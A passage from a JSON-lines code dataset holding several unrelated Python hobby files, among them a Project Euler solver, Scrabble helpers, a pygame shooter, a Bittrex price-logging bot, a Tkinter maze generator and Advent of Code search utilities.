return result\n\n","sub_path":"13. 罗马数字转整数.py","file_name":"13. 罗马数字转整数.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"150159474","text":"# problemName = \"Largest prime factor\"\n# problemNum = 3\n# solutionBy = \"FIGBERT\"\n# language = \"Python\"\n# dateCompleted = \"21/01/2020\"\nimport math\n\ndef prime_factors(num):\n primes = []\n factor_limit = int(math.sqrt(num)) + 1\n while num % 2 == 0: \n primes.append(2)\n num = num / 2\n for i in range(3, factor_limit, 2):\n while num % i == 0: \n primes.append(i)\n num = num / i\n if num > 2: \n primes.append(num)\n return primes\n\nif __name__ == \"__main__\":\n answer = max(prime_factors(600851475143))\n print(\n \"The largest prime factor of the number 600851475143 is %s\" % answer\n )\n","sub_path":"problem003.py","file_name":"problem003.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"116251571","text":"import codecs\nimport os\nimport random\nimport shutil\n\n\ninput_dir = ''\ntrain_dir = ''\nval_dir = ''\n\nif not os.path.exists(train_dir):\n os.mkdir(train_dir)\nif not os.path.exists(val_dir):\n os.mkdir(val_dir)\nimg_files = os.listdir(input_dir)\nrandom.shuffle(img_files)\n\nall_num = len(img_files)\nprint(all_num)\ntrain_img = img_files[:int(0.8 * all_num)]\n\nval_img = img_files[int(0.8 * all_num):]\n\nfor img_file in train_img:\n if not img_file.endswith('g'):\n continue\n shutil.copy(os.path.join(input_dir, img_file), train_dir)\nfor img_file in val_img:\n if not img_file.endswith('g'):\n continue\n shutil.copy(os.path.join(input_dir, img_file), val_dir)\n","sub_path":"split_data.py","file_name":"split_data.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"502867962","text":"import re\n\nVOWELS = 'aeiou'\nCONSONANTS = 'bcdfghjklmnpqrstvwxyz'\nWORDLIST_FILENAME = \"words.txt\"\nSCRABBLE_LETTER_VALUES = {\n 'a': 1, 'b': 3, 'c': 3, 'd': 2, 'e': 1, 'f': 4, 'g': 2, 'h': 4, 'i': 1, 'j': 8, 'k': 5, 'l': 1, 'm': 3, 'n': 1, 'o': 1, 'p': 3, 'q': 10, 'r': 1, 's': 1, 't': 1, 'u': 1, 'v': 4, 'w': 4, 'x': 8, 'y': 4, 'z': 10\n}\n\n\ndef letter_score(letter):\n return SCRABBLE_LETTER_VALUES.get(letter, 0)\n\n#\n# Problem #1: Scoring a word\n#\n\n\ndef get_word_score(word, n):\n \"\"\"\n Returns the score for a word. Assumes the word is a\n valid word.\n\n You may assume that the input word is always either a string of letters, \n or the empty string \"\". You may not assume that the string will only contain \n lowercase letters, so you will have to handle uppercase and mixed case strings \n appropriately. \n\n The score for a word is the product of two components:\n\n The first component is the sum of the points for letters in the word.\n The second component is the larger of:\n 1, or\n 7*wordlen - 3*(n-wordlen), where wordlen is the length of the word\n and n is the hand length when the word was played\n\n Letters are scored as in Scrabble; A is worth 1, B is\n worth 3, C is worth 3, D is worth 2, E is worth 1, and so on.\n\n word: string\n n: int >= 0\n returns: int >= 0\n \"\"\"\n\n sum_letter_score = 0\n for letter in word.lower():\n sum_letter_score += letter_score(letter)\n\n wordlen = len(word)\n num_word = 7*wordlen - 3*(n-wordlen)\n if 1 > num_word:\n larger = 1\n else:\n larger = num_word\n\n return sum_letter_score * larger\n\n#\n# Make sure you understand how this function works and what it does!\n#\n\n\ndef wildcard_to_regex(word: str) -> re:\n return re.compile(\"^\" + word.replace(\"*\", \".\") + \"$\")\n\n#\n# Problem #3: Test word validity\n#\n\n\ndef is_valid_word(word, hand, word_list):\n \"\"\"\n Returns True if word is in the word_list and is entirely\n composed of letters in the hand. Otherwise, returns False.\n Does not mutate hand or word_list.\n\n word: string\n hand: dictionary (string -> int)\n word_list: list of lowercase strings\n returns: boolean\n \"\"\"\n word_lower = word.lower()\n regex = wildcard_to_regex(word_lower)\n num_matches = len(list(filter(regex.match, word_list)))\n if num_matches == 0:\n return False\n\n word_freq_dict = get_frequency_dict(word_lower)\n for key in word_freq_dict.keys():\n if key not in hand.keys():\n return False\n for pair in word_freq_dict.items():\n # If letter appears more times in word than in hand\n if pair[1] > hand[pair[0]]:\n return False\n return True\n\n#\n# Problem #5: Playing a hand\n#\n\n\ndef calculate_handlen(hand):\n \"\"\" \n Returns the length (number of letters) in the current hand.\n\n hand: dictionary (string-> int)\n returns: integer\n \"\"\"\n\n sum = 0\n for value in hand.values():\n sum += value\n return sum\n\n\ndef get_input(message: str):\n return input(message).strip().lower()\n# -----------------------------------\n# Helper code\n# (you don't need to understand this helper code)\n\n\ndef load_words():\n \"\"\"\n Returns a list of valid words. Words are strings of lowercase letters.\n\n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n\n print(\"Loading word list from file...\")\n # wordlist: list of strings\n wordlist = []\n with open(WORDLIST_FILENAME, 'r') as inFile:\n for line in inFile:\n wordlist.append(line.strip().lower())\n\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\n\ndef get_frequency_dict(sequence):\n \"\"\"\n Returns a dictionary where the keys are elements of the sequence\n and the values are integer counts, for the number of times that\n an element is repeated in the sequence.\n\n sequence: string or list\n return: dictionary\n \"\"\"\n\n # freqs: dictionary (element_type -> int)\n freq = {}\n for x in sequence:\n freq[x] = freq.get(x, 0) + 1\n return freq\n\n\n# (end of helper code)\n# -----------------------------------\n","sub_path":"gameutil.py","file_name":"gameutil.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"122313155","text":"\n\nfrom random import randint\n\nimport pygame\nfrom pygame.locals import *\n\nfrom spritesheet import SpriteSheet\n\n\npygame.init()\nscreen = pygame.display.set_mode((500, 600))\n\nsprite_sheet = SpriteSheet('assets/shooter_sheet.sheet')\nstar_surface = sprite_sheet.new_surface('star_y_1')\nship_surface = sprite_sheet.new_surface('ship')\n\nclass Star(pygame.sprite.Sprite):\n def __init__(self, surface, speed, start_x):\n pygame.sprite.Sprite.__init__(self)\n self.image = surface\n self.rect = self.image.get_rect()\n self.last_time = pygame.time.get_ticks()\n self.y = 0\n self.rect.x = start_x\n self.speed = speed\n \n def update(self):\n if self.rect.y >= 600:\n self.kill()\n return\n current_time = pygame.time.get_ticks()\n delta_time = current_time - self.last_time\n self.y += ((self.speed) * delta_time) * 0.001\n self.rect.y = self.y\n self.last_time = current_time\n\nclass Ship(pygame.sprite.Sprite):\n def __init__(self, surface, start_x, start_y):\n pygame.sprite.Sprite.__init__(self)\n self.image = surface\n self.rect = self.image.get_rect()\n self.rect.x = start_x\n self.rect.y = start_y\n self.last_time = pygame.time.get_ticks()\n self.h_velocity = 0\n self.x = start_x\n\n def update(self):\n current_time = pygame.time.get_ticks()\n delta_time = current_time - self.last_time\n self.x += ((self.h_velocity) * delta_time) * 0.335\n self.rect.x = self.x\n self.last_time = current_time\n \nbackground_group = pygame.sprite.RenderUpdates()\nship_group = pygame.sprite.RenderUpdates()\n\nship = Ship(ship_surface, screen.get_width()/2, screen.get_height()-40)\nship_group.add(ship)\n\ngame_running = True\nwhile game_running:\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n game_running = False\n if event.key == K_LEFT:\n ship.h_velocity += -1\n if event.key == K_RIGHT:\n ship.h_velocity += 1\n if event.type == KEYUP:\n if event.key == K_LEFT:\n ship.h_velocity -= -1\n if event.key == K_RIGHT:\n ship.h_velocity -= 1\n \n if randint(0,100) == 1:\n star_speed = randint(300,400)\n star_y_location = randint(0,screen.get_width())\n new_star = Star(star_surface, star_speed, star_y_location)\n background_group.add(new_star)\n \n screen.fill((0,0,0))\n background_group.update()\n ship_group.update()\n \n updated_rects = []\n updated_rects += background_group.draw(screen)\n updated_rects += ship_group.draw(screen)\n pygame.display.update(updated_rects)\n\n\n","sub_path":"08_add_the_ship.py","file_name":"08_add_the_ship.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"186070504","text":"import csv\nimport datetime as datetime\nimport json\nimport time\nfrom datetime import datetime\nfrom getpass import _raw_input\n\nfrom bittrex import Bittrex\nfrom _thread import start_new_thread, allocate_lock\n\n#classes\nclass Hist_element:\n def __init__(self, id, amount, price, ts):\n self.id = id\n self.amount = amount\n self.price = price\n self.ts = ts\n\n def __eq__(self, other):\n return self.id == other.id\n\n def __str__(self):\n return str(self.__dict__)\n\nclass Out_element1:\n def __init__(self,minutes, price, trans_amount, coin_amount, change_sm, change_md, change_lg, t0_price):\n self.minutes = minutes\n self.price = \"{:.16f}\".format(float(price))\n self.trans_amount = \"{:.16f}\".format(float(trans_amount))\n self.coin_amount = \"{:.16f}\".format(float(coin_amount))\n self.change_sm = \"{:.16f}\".format(float(change_sm))\n self.change_md = \"{:.16f}\".format(float(change_md))\n self.change_lg = \"{:.16f}\".format(float(change_lg))\n self.t0_price = \"{:.16f}\".format(float(t0_price))\n\n def getIterable(self):\n return [self.minutes, self.price, self.trans_amount, self.coin_amount, self.change_sm, self.change_md, self.change_lg, self.t0_price]\n\n#settings\nCHANGE_SM = 5*60 #seconds\nCHANGE_MD = 15*60 #seconds\nCHANGE_LG = 30*60 #seconds\nHISTORY = 60*60 #size of history store in seconds\nOFFSET = 30*60 #time for future prediction\n#vars + init\nmy_bitterx = Bittrex(None, None)\nmarkets = []\nbit_markets = my_bitterx.get_markets()[\"result\"]\nfor market in bit_markets:\n markets.append(market[\"BaseCurrency\"]+\"-\"+market[\"MarketCurrency\"])\nprint(markets)\nhistory_store = [] #storage for history\n#markets = json.load(open(\"markets.json\",'r'))\nfor market in markets:\n history_store.append({ \"flag\": False, \"market\": market, \"history\":[]})\nlock = allocate_lock()\n\n#extract markethistory\ndef hist_fetch(a):\n global my_bitterx, history_store, markets\n print(\"Thread 1 started\")\n while True:\n for store in history_store:\n if store[\"market\"] == a:\n akt_hist = Bittrex.get_market_history(my_bitterx,a,200)[\"result\"] #get history for every market\n if akt_hist:\n akt_hist.reverse()\n for element in akt_hist:\n try:\n element = Hist_element(element['Id'],element['Quantity'],element['Price'],datetime.strptime(element['TimeStamp'],'%Y-%m-%dT%H:%M:%S.%f')) #get required fields\n #print(element)\n except ValueError:\n element = Hist_element(element['Id'],element['Quantity'],element['Price'],datetime.strptime(element['TimeStamp'],'%Y-%m-%dT%H:%M:%S')) #get required fields\n lock.acquire()\n if element not in store[\"history\"]:\n store[\"history\"].append(element)\n #print(store[\"market\"] + \" added: \"+str(element))\n lock.release()\n lock.acquire()\n while (datetime.utcnow().timestamp() - store[\"history\"][0].ts.timestamp()) > HISTORY:\n #print(str(history_store[i][0]))\n #print((history_store[i][0].ts.timestamp()-datetime.utcnow().timestamp())/60)\n store[\"flag\"] = True\n store[\"history\"].pop(0)\n if len(store[\"history\"]) == 0:\n break\n print(store[\"market\"]+\": \"+str(len(store[\"history\"])))\n #print((datetime.utcnow().timestamp()-history_store[i][len(history_store[i])-1].ts.timestamp())/60)\n #print((datetime.utcnow().timestamp()-history_store[i][0].ts.timestamp())/60)\n lock.release()\n time.sleep(20)\n\ndef brain_result(b):\n global history_store\n print(\"Thread 2 started\")\n for element in history_store:\n element[\"Flag\"] = False\n while True:\n print(\"I am working\")\n for store in history_store:\n if store[\"flag\"]: #true if history goes back 30 minutes\n print(\"Output steht bevor: \"+store[\"market\"])\n coin_count, transactions, changesm, changemd, changelg = 0, 0, 0, 0, 0\n akt_value = my_bitterx.get_ticker(store[\"market\"])['result']['Last']\n offset_value = 0\n for element in store[\"history\"]:\n if (datetime.utcnow().timestamp() - element.ts.timestamp()) < OFFSET:\n offset_value = element.price\n akt_time = datetime.utcnow().hour * 60 + datetime.utcnow().minute\n changelg = offset_value - store[\"history\"][0].price\n lock.acquire()\n for counter, element in enumerate(store[\"history\"]):\n time_diff = datetime.utcnow().timestamp() - element.ts.timestamp()\n if time_diff < (CHANGE_SM + OFFSET) and time_diff > OFFSET:\n if changesm == 0:\n changesm = (offset_value - element.price) / element.price\n transactions += 1\n coin_count += element.amount\n else:\n if time_diff < (CHANGE_MD + OFFSET) and time_diff > OFFSET and changemd == 0:\n changemd = (offset_value - element.price) / element.price\n lock.release()\n out = Out_element1(akt_time, offset_value, transactions, coin_count, changesm, changemd, changelg, akt_value)\n with open(\"brain_out.csv\", \"a\") as brain_out:\n csv_writer = csv.writer(brain_out, delimiter=';', lineterminator='\\n', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n csv_writer.writerow(out.getIterable())\n #print(\"New Output\")\n time.sleep(5*60)\n\n\nfor market in markets:\n start_new_thread(hist_fetch,(market,))\ntime.sleep(60*60)\nstart_new_thread(brain_result,(2,))\nc = _raw_input(\"Eingabe.\")\n","sub_path":"Brain_In_Gen/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":6131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"499225616","text":"\n\n\nfrom Tkinter import *\nfrom math import *\nfrom numpy import *\nfrom tkMessageBox import *\n\nclass UnionFind:\n #This is the classic Union find class that we went over in class\n def __init__(self, dimension):\n dimension = int(dimension)\n self.N = dimension*dimension\n self.nodes = [0] * self.N\n self.sz = [1] * self.N\n\n for i in range(0, self.N):\n self.nodes[i] = i\n\n def find(self, i):\n while i != self.nodes[i]:\n self.nodes[i] = self.nodes[self.nodes[i]]\n i = self.nodes[i]\n return i\n\n\n def connected(self, p, q):\n return self.find(p) == self.find(q)\n\n def union(self, p, q):\n i = self.find(p)\n j = self.find(q)\n if self.sz[i] < self.sz[j]:\n self.nodes[i] = j\n self.sz[j] += self.sz[i]\n else:\n self.nodes[j] = i\n self.sz[i] += self.sz[i]\n\n\nclass Maze:\n def __init__(self, dimension, win):\n dimension = int(dimension)\n self.window = win\n self.total_y = 0\n self.total_x = 0\n self.walls = []\n self.current_walls = []\n self.locale = [0, 0]\n self.locale_list = [0, 0]\n self.counter = 0\n self.dimension = dimension\n o_w = dimension*20+20\n #outer wall\n #below line generates the coordinates for the initial start of the dot\n self.coordinates = [[20, 20, 20, o_w], [20, o_w, o_w-20, o_w], [o_w, o_w, o_w, \\\n 20], [o_w, 20, 40, 20]]\n\n self.generate_maze(dimension)\n \n def generate_maze(self, dimension):\n self.walls = []\n self.wall_check = []\n checker = 0\n skip_line = 1\n tally = 1\n #this section of code runs through a for loop to create a list of \"walls\" in my program\n #(0, 1), (0, 5), (1, 2) etc.\n for i in range(0, dimension*dimension):\n if checker == i:\n value = tally*dimension-1\n checker = value\n if skip_line == 1:\n skip_line = 0\n else:\n skip_line = 1\n tally += 1\n if skip_line == 0:\n self.walls.append([i, i+1])\n if i < (dimension*dimension-dimension):\n self.walls.append([i, i+dimension])\n skip_line = 0\n self.current_walls = self.walls\n \n random.seed()\n while len(self.current_walls) != 0:\n num = random.randint(0, len(self.current_walls))\n i = self.current_walls[num][0]\n j = self.current_walls[num][1]\n #this section of code takes a random number and grabs a wall from my list\n #self.current_walls above is the list that this section of code will cycle through in order\n #to make sure that each of the sections are either connected compoments or have a wall deleted\n self.current_walls.remove(self.current_walls[num])\n if not UF.connected(i, j):\n UF.union(i, j)\n self.wall_check = self.wall_check + [[i, j]]\n else:\n tally = 0\n orig_i = i\n orig_j = j\n #if the section is already connected and I want to draw an line in Tkinter I figure out\n #what section of the theoretical grid that wall should be in by reducing it to its\n #lowest value 0 through N (dimensions of maze). That's what the below section does \n while i >= dimension or j >= dimension:\n if i >= dimension:\n i = i-dimension\n if j >= dimension:\n j = j-dimension\n tally += 1\n if orig_j-orig_i != 1:\n #this section adds coordinates of the walls based on the position of the wall that was\n #found in the above code\n #i and j are those reduced values and tally just keep track of how many times it was reduced\n #which nicely turns out to be the position of the wall on the y axis\n self.coordinates = self.coordinates + [[20+i*20,\\\n 20+tally*20, 20+(i+1)*20, 20+tally*20]]\n else:\n self.coordinates = self.coordinates + [[20+j*20, \\\n 20+tally*20, 20+j*20, 20+(tally+1)*20]]\n self.coordinates = self.coordinates + [[28, 28, 28, 32], [29, 28, 29, 32], \\\n [30, 28, 30, 32], [31, 28, 31, 32], [32, 28, 32, 32]]\n self.draw_ball(0, 0)\n\n\n def draw_maze(self, list_points):\n self.window.delete(\"all\")\n for i in range (0, len(list_points)-1):\n #pretty straightforward section. I draw the lines here based on the coordinates list\n #the i<4 section is just to make the outside lines a different color\n if i < 4:\n self.window.create_line(list_points[i][0], list_points[i][1], \\\n list_points[i][2], list_points[i][3], fill=\"red\")\n else:\n self.window.create_line(list_points[i][0], list_points[i][1], \\\n list_points[i][2], list_points[i][3], fill=\"blue\") \n\n\n\n def draw_ball(self, shift_y, shift_x):\n self.total_y = self.total_y + shift_y\n self.total_x = self.total_x + shift_x\n ty = self.total_y\n tx = self.total_x\n\n #I use these values to keep track of where the dot should be\n #these make the move_ball function easy to implement, by just changing the x or y\n #coordinates by a certain value, essentially a translation\n\n self.coordinates = self.coordinates + \\\n [[28+tx, 28+ty, 28+tx, 32+ty], [29+tx, 28+ty, 29+tx, 32+ty], \\\n [30+tx, 28+ty, 30+tx, 32+ty], [31+tx, 28+ty, 31+tx, 32+ty], \\\n [32+tx, 28+ty, 32+tx, 32+ty]]\n\n self.draw_maze(self.coordinates)\n\n\n def move_ball(self, event):\n #locale value coordinates the location of the dot with the list of walls so\n #that the dot doesn't go through walls it shouldn't\n #in these functions is also the code that erases the dot if the dot retraces its steps\n #this code also allows for a cheat where you leave the maze through the top of the initial\n #position, that coding is the self.counter part of the puzzle. self.counter will always be\n #0, unless you press i (and move up) from position 0,0. If you move up from 0,0, you will\n #be able to move the dot freely around the map. If you move the dot in a specific way you\n #can still win! but you will have cheated. (this specific implementation only works for a\n #20x20 size map)\n if event.char == 'l':\n self.locale[1] = self.locale[1] + 1\n if self.counter == 0:\n if self.locale in self.wall_check:\n self.locale[0] = self.locale[0] + 1\n locale = [[self.locale[0], self.locale[1]]]\n locale_check = [self.locale[0], self.locale[1]]\n if locale_check not in self.locale_list:\n self.locale_list = self.locale_list + locale\n else:\n for i in range (0, 10):\n self.coordinates.remove(self.coordinates[len(self.coordinates)-1])\n self.locale_list.remove(self.locale_list[len(self.locale_list)-1])\n self.draw_ball(0, 20)\n else:\n self.locale[1] = self.locale[1] - 1\n else:\n self.draw_ball(0, 20)\n if self.locale == [self.dimension**2-1, self.dimension**2-1]:\n showinfo('Ok', 'You Win!! Well done!')\n\n\n\n if event.char == 'k':\n self.locale[1] = self.locale[1] + self.dimension\n if self.counter == 0:\n if self.locale in self.wall_check:\n self.locale[0] = self.locale[0] + self.dimension\n locale = [[self.locale[0], self.locale[1]]]\n locale_check = [self.locale[0], self.locale[1]]\n if locale_check not in self.locale_list:\n self.locale_list = self.locale_list + locale\n else:\n for i in range (0, 10):\n self.coordinates.remove(self.coordinates[len(self.coordinates)-1])\n self.locale_list.remove(self.locale_list[len(self.locale_list)-1])\n self.draw_ball(20, 0)\n else:\n self.locale[1] = self.locale[1] - self.dimension\n else:\n self.draw_ball(20, 0)\n if self.locale == [self.dimension**2-1, self.dimension**2-1]:\n showinfo('Ok', 'You Win!! Well done!')\n\n\n\n if event.char == 'i':\n if self.locale[0] == 0 and self.locale[1] == 0:\n self.counter = 1\n self.locale[0] = self.locale[0] - self.dimension\n if self.counter == 0:\n if self.locale in self.wall_check:\n self.locale[1] = self.locale[1] - self.dimension\n locale = [[self.locale[0], self.locale[1]]]\n locale_check = [self.locale[0], self.locale[1]]\n if locale_check not in self.locale_list:\n self.locale_list = self.locale_list + locale\n else:\n for i in range (0, 10):\n self.coordinates.remove(self.coordinates[len(self.coordinates)-1])\n self.locale_list.remove(self.locale_list[len(self.locale_list)-1])\n\n self.draw_ball(-20, 0)\n else:\n self.locale[0] = self.locale[0] + self.dimension\n else:\n self.draw_ball(-20, 0)\n if self.locale == [-41, 440]:\n showinfo('Ok', 'You Win!! But you cheated... Naughty naughty.')\n\n\n\n if event.char == 'j':\n self.locale[0] = self.locale[0] - 1\n if self.counter == 0:\n if self.locale in self.wall_check:\n self.locale[1] = self.locale[1] - 1\n locale = [[self.locale[0], self.locale[1]]]\n locale_check = [self.locale[0], self.locale[1]]\n if locale_check not in self.locale_list:\n self.locale_list = self.locale_list + locale\n else:\n for i in range (0, 10):\n self.coordinates.remove(self.coordinates[len(self.coordinates)-1])\n self.locale_list.remove(self.locale_list[len(self.locale_list)-1])\n self.draw_ball(0, -20)\n else:\n self.locale[0] = self.locale[0] + 1\n else:\n self.draw_ball(0, -20)\n\n\n\n \n\n\n\n\n\nif __name__ == \"__main__\":\n # create a Tkinter \n window = Canvas(Tk(), width=700, height=700)\n window.pack()\n\n # create a 2D object\n n = 30\n UF = UnionFind(n)\n my_maze = Maze(n, window)\n #can also have sys.argv or raw_input() to allow the user to choose the file\n #box.txt is simply the file that I created for this program to use, any\n #other similarly ordered text file would also work, such as rectangle\n\n # define function that captures keyboard events\n window.bind_all(\"\", my_maze.move_ball)\n\n # start the event handler\n mainloop()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Simple Maze with Random Generation/Maze_orig.py","file_name":"Maze_orig.py","file_ext":"py","file_size_in_byte":14502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"530367926","text":"\"\"\"Tools to help solve advent of code problems faster\"\"\"\nimport abc\nimport collections\nimport contextlib\nimport copy\nimport datetime\nimport hashlib\nimport itertools\nimport os\nimport shutil\nimport urllib.request\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\ndef set_up_directory(day):\n \"\"\"Make a new directory for working on an advent of code problem\n\n Args:\n day: int\n day of the month to work on\n\n Returns:\n new_dir: str\n path to the directory for that day\n \"\"\"\n this_dir = os.path.dirname(__file__)\n new_dir = os.path.join(this_dir, 'day' + str(day))\n with contextlib.suppress(FileExistsError):\n os.mkdir(new_dir)\n new_file_name = os.path.join(new_dir, 'day' + str(day) + '.py')\n template_file_name = os.path.join(this_dir, 'template.py')\n if not(os.path.exists(new_file_name)):\n shutil.copy(template_file_name, new_file_name)\n return new_dir\n\n\ndef download_input_data(day, new_dir):\n \"\"\"Download input data for an advent of code problem\n\n Args:\n day: int\n day of the month to work on\n new_dir: str\n path to the directory for that day\n\n Returns:\n None\n \"\"\"\n with open('session_cookie.txt') as cookie_file:\n session_cookie = cookie_file.read()\n url = f'https://adventofcode.com/2016/day/{day}/input'\n opener = urllib.request.build_opener()\n opener.addheaders = [('cookie', 'session=' + session_cookie)]\n urllib.request.install_opener(opener)\n input_file = os.path.join(new_dir, 'input.txt')\n urllib.request.urlretrieve(url, input_file)\n\n\ndef start_coding(day):\n \"\"\"Prepare to code an advent of code problem\n\n Args:\n day: int\n day of the month to work on\n\n Returns:\n None\n \"\"\"\n new_dir = set_up_directory(day)\n download_input_data(day, new_dir)\n\n\ndef start_coding_today():\n \"\"\"Prepare to code today's advent of code problem\"\"\"\n day_of_month = datetime.datetime.today().day\n start_coding(day_of_month)\n\n\ndef read_input_lines():\n \"\"\"Open today's input data and return it as a list of lines\n\n Returns:\n [str]\n Lines in 'input.txt'\n \"\"\"\n with open('input.txt') as in_file:\n data = in_file.read().strip().splitlines()\n return data\n\n\ndef read_whole_input():\n \"\"\"Open today's input data and return it as a single string\n\n Returns:\n str\n Contents of 'input.txt'\n \"\"\"\n with open('input.txt') as in_file:\n data = in_file.read().strip()\n return data\n\n\ndef count_times_true(function):\n \"\"\"Count the number of times some function is true for the input lines\n\n Args:\n function: callable\n A function that takes a string and returns a boolean\n\n Returns:\n count: int\n The number of times the function returns True, when evaluated\n over each line of the file 'input.txt'\n \"\"\"\n strings = read_input_lines()\n valid = [function(string) for string in strings]\n return sum(valid)\n\n\nclass PlottingGrid:\n \"\"\"A tool for maintaining and plotting a grid of numbers\n\n Not abstract, since it works on its own, but designed to be inherited\n with some methods added that manipulate self.grid between construction\n and showing\n\n One note, always use self.grid(y, x) to get and set values, with the\n column first and the row second. It's weird, but that's how numpy works\n \"\"\"\n\n def __init__(self, shape):\n \"\"\"Constructor\n\n Args:\n shape: (int, int)\n Number of rows and number of columns in the grid\n \"\"\"\n self.grid = np.zeros(shape)\n\n def read_input_file(self, char_map):\n \"\"\"Read and store the grid from today's input file\n\n Args:\n char_map: {str: int}\n Mapping of characters in the file to integers in the numpy\n array. For example {'.' : 0, '#' : 1} which is typical\n Topaz-notation for a maze with open areas and walls\n Returns:\n\n \"\"\"\n lines = read_input_lines()\n for y_pos, line in enumerate(lines):\n for x_pos, char in enumerate(line):\n self.grid[y_pos, x_pos] = char_map[char]\n\n def show(self):\n \"\"\"Show the grid in a new window\n\n Execution will be suspended until the window is closed\n\n Returns:\n None\n \"\"\"\n plt.clf()\n plt.imshow(self.grid)\n plt.colorbar()\n plt.show()\n\n def draw(self, pause_time=0.01):\n \"\"\"Draw the grid in a new window\n\n Execution will be paused for pause_time but not stopped. Note that\n the screen will close after the pause time. It is advised to use\n this method while animating but then to run show() at the end\n\n Args:\n pause_time: float\n Number of seconds to pause after drawing\n\n Returns:\n None\n \"\"\"\n plt.clf()\n plt.imshow(self.grid)\n plt.colorbar()\n plt.draw()\n plt.pause(pause_time)\n\n def sum(self):\n \"\"\"Returns the sum of the values in the grid\n\n Returns:\n sum : int\n Sum of the values stored in this object's grid\n \"\"\"\n return np.sum(self.grid)\n\n def count(self):\n \"\"\"Count of non-zero elements in the grid\n\n Returns:\n count : int\n Count of elements of this object's grid which are non-zero\n \"\"\"\n return np.sum(self.grid != 0)\n\n\nclass StateForGraphs(abc.ABC):\n \"\"\"A starter for a state class for use in graph traversal\n\n One requirement to make this work in number_of_bfs_steps, below, is to\n implement __hash__ and __eq__. What I have found is the simplest way to do\n that is to make a unique string representation of each step, and use\n that to hash and compare the object. That's what's used by default here,\n so that only __str__ must be implemented by the child object. But if\n that doesn't work, just override __hash__ and __eq__ directly.\n\n The second requirement is to implement possible_next_states,\n which provides the edges of the graphs connected to this node, or state.\n That's where the real meat of the problem will end up.\n\n The third requirement is to implement is_final, which tells the BFS\n search when it has reached the destination node.\n\n Notes for optimization of breadth-first searches:\n - If two states are equivalent in some way, as in the steps required\n don't depend on any differences between them, make their string\n representations the same, so that they compare as equal\n - Look for patterns in the best strategies. Don't return paths\n guaranteed to be suboptimal from possible_next_states\n \"\"\"\n\n @abc.abstractmethod\n def __str__(self):\n \"\"\"Return string representation. Used for hashing and comparing equal\n \"\"\"\n pass\n\n def __hash__(self):\n return hash(str(self))\n\n def __eq__(self, other):\n return str(self) == str(other)\n\n @abc.abstractmethod\n def is_final(self):\n \"\"\"Whether this is the final, destination node in the search\n\n Returns:\n is_final_node : bool\n \"\"\"\n return False\n\n @abc.abstractmethod\n def possible_next_states(self):\n \"\"\"Create and return states reachable from this one in one step\n\n This is where the details of the problem go. This should return a\n set of valid states reachable from the current state in one step.\n\n For optimization reasons, it is best to reject steps known to be\n globally suboptimal in this method, by not returning them. The fewer\n states this method returns, the faster the search will go. But if\n the globally optimal next state is not contained in the result,\n the search will not find the minimum number of steps.\n\n Returns:\n Set of StateForGraphs\n States reachable from this state in one step\n \"\"\"\n return set(copy.deepcopy(self))\n\n\ndef number_of_bfs_steps(current_state):\n \"\"\"Perform a breadth-first search and return number of steps taken\n\n Args:\n current_state: StateForGraphs\n The state at the beginning of the search; the root of the tree.\n\n Returns:\n The number of steps required to get from current_state to\n a final state, using state.possible_next_states to find states\n reachable in one step from the current state\n\n See Also: StateForGraphs\n to understand the required methods for the states used in the graph.\n The states must implement __hash__, __eq__, possible_next_states,\n and is_final\n \"\"\"\n queue = collections.deque()\n discovered = {current_state: 0}\n queue.append(current_state)\n while queue:\n state = queue.popleft()\n num_steps = discovered[state]\n new_states = state.possible_next_states()\n for new_state in new_states:\n if new_state.is_final():\n return num_steps + 1\n if new_state not in discovered:\n discovered[new_state] = num_steps + 1\n queue.append(new_state)\n\n\ndef number_of_reachable_in_steps(current_state, max_steps):\n \"\"\"Find the number of states reachable from this one in max steps\n\n Use a breadth-first search to figure out how many states are reachable\n from the current state, with a maximum of max_steps steps, when each state\n can provide the states it can reach in one state.\n\n Args:\n current_state: StateForGraphs\n The state at the beginning of the search; the root of the tree.\n max_steps: int\n The maximum number of steps to take, using\n state.possible_next_states to find states reachable in one step\n from the current state\n\n Returns:\n number_reachable : int\n Number of distinct states reachable from current_state,\n with fewer or equal to max_steps steps.\n\n See Also: StateForGraphs\n to understand the required methods for the states used in the graph.\n The states must implement __hash__, __eq__, and possible_next_states\n \"\"\"\n queue = collections.deque()\n discovered = {current_state: 0}\n queue.append(current_state)\n while queue:\n state = queue.popleft()\n num_steps = discovered[state]\n if num_steps < max_steps:\n new_states = state.possible_next_states()\n for new_state in new_states:\n if new_state not in discovered:\n discovered[new_state] = num_steps + 1\n queue.append(new_state)\n return len(discovered)\n\n\ndef longest_path(current_state):\n \"\"\"Find longest possible path from the current state to the final state\n\n Args:\n current_state: StateForGraphs\n The state at the beginning of the search; the root of the tree.\n\n Returns:\n The maximum number of steps that can be used to get from\n current_state to a final state, using state.possible_next_states to\n find states reachable in one step from the current state\n\n See Also: StateForGraphs\n to understand the required methods for the states used in the graph.\n The states must implement __hash__, __eq__, possible_next_states,\n and is_final\n \"\"\"\n queue = collections.deque()\n discovered = {current_state: 0}\n queue.append(current_state)\n lengths = set()\n while queue:\n state = queue.popleft()\n num_steps = discovered[state]\n new_states = state.possible_next_states()\n for new_state in new_states:\n if new_state.is_final():\n lengths.add(num_steps + 1)\n elif new_state not in 